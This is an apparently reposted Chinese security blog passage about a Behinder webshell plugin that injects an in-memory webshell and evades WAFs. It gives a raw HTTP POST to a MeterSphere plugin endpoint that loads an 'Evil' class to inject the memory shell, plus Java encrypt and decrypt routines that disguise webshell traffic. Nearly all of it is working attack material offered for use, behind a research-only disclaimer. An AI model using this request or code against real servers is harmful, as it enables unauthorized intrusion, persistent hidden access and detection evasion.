命令执行
注入内存马
- 传入inject编码后的Base64进行注入冰蝎内存马
POST /plugin/customMethod HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Connection: close
Cookie: MS_SESSION_ID=75407ecc-369b-48a7-ae80-d000f0d1b700
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 65{
"entry": "org.metersphere.Evil",
"request": "aW5qZWN0"
}
- 冰蝎加密函数
private byte[] Encrypt(byte[] data) {
byte[] dt = new byte[data.length];
for (int i = 0; i < data.length; i++) {
dt[i] = (byte) (data[i] + 1);
}
try {
java.io.ByteArrayOutputStream o = new java.io.ByteArrayOutputStream();
java.util.zip.GZIPOutputStream g = new java.util.zip.GZIPOutputStream(o);
g.write(dt);
g.close();
byte[] c = o.toByteArray();
byte[] ct = new byte[c.length];
for (int i = 0; i < c.length; i++) {
ct[i] = (byte) (c[i] + 1);
}
return ct;
} catch (Exception ignored) {
}
return data;
}
- 冰蝎解密函数
private byte[] Decrypt(byte[] data) {
byte[] dt = new byte[data.length];
for (int i = 0; i < data.length; i++) {
dt[i] = (byte) (data[i] - 1);
}
try {
java.io.ByteArrayInputStream t = new java.io.ByteArrayInputStream(dt);
java.util.zip.GZIPInputStream i = new java.util.zip.GZIPInputStream(t, dt.length);
byte[] c = r(i);
byte[] ct = new byte[c.length];
for (int b = 0; b < c.length; b++) {
ct[b] = (byte) (c[b] - 1);
}
return ct;
} catch (Exception ignored) {
}
return data;
}
private byte[] r(java.io.InputStream i) {
byte[] temp = new byte[1024];
java.io.ByteArrayOutputStream b = new java.io.ByteArrayOutputStream();
int n;
try {
while((n = i.read(temp)) != -1) {b.write(temp, 0, n);
}} catch (Exception ignored) {
}
return b.toByteArray();
}
原文始发于微信公众号(夜组安全):冰蝎插件-支持注入内存马和Bypass WAF
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论